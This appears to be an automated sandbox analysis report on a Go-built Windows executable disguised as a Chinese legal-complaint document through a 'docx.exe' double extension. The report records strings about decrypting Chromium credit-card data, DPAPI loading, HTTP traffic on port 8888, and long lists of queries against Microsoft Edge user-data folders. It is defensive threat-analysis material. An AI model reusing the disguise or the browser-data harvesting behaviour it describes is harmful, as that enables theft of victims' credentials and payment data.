NewTickerflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9'_' must separate successive digits" is unexported but missing PkgPathreflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=mime: bogus characters after %%: %qunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineexpected unsigned integer; found %snon-comparable types %s: %v, %s: %vbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)unpaired removeDep: no %T dep on %T2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00MakeAggregate function returned niltransform: short destination bufferrange can only initialize variablesP224 point is the point at infinityP256 point is the point
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: failed to construct HKDF label: %sillegal base64 data at input byte too many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: flag provided but not defined: -%scan't evaluate field %s in type %scan't handle %s for arg of type %svalue is nil; should be of type %scrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapsql: expected %d arguments, got %dunpaired removeDep: no deps for %Tdecrypt chromium credit card errorcannot find extensions in settingssemaphore: released more than heldinvalid nested repetition operatorinvalid or unsupported Perl syntaxinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizedriver: remove argument from queryunsupported type %T, a slice of %sleveldb/table: invalid slice rangesnappy: decoded block is too largesnappy: unsupported literal lengthunsigned integer overflow on token 2006-01-02T15:04:05.999999999Z07:00form-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0error creating zip entry for %s: %werror removing original file %s: %whash/crc32: invalid hash state sizestrings.Reader.Seek: invalid whencenon-positive interval for NewTickerflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9'_' must separate successive digits" is unexported but missing PkgPathreflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=mime: bogus characters after %%: %qunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineexpected unsigned integer; found %snon-comparable types %s: %v, %s: %vbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)unpaired removeDep: no %T dep on %T2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00MakeAggregate function returned niltransform: short destination bufferrange can only initialize variablesP224 point is the point at infinityP256 point is the point
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: flag verification failed: password-check not found%s has arguments but cannot be invoked as functioncrypto/elliptic: nistec rejected normalized scalarx509: missing ASN.1 contents; use ParseCertificatex509: invalid RDNSequence: invalid attribute valuex509: RSA public exponent is not a positive numberchacha20: SetCounter attempted to rollback counterhttps://microsoftedge.microsoft.com/addons/detail/edwards25519: invalid SetUniformBytes input length %3d \| %10d \| %13.5f \| %13.5f \| %13.5f \| %13.5f
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: mswsock.dll	Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static file information: File size 12996608 > 1048576

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5fc400
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x5a3000

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: section name: .xdata
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: section name: .symtab

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: docx.exe

Static PE information: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2121298740.0000017DA0EB8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation	Jump to behavior
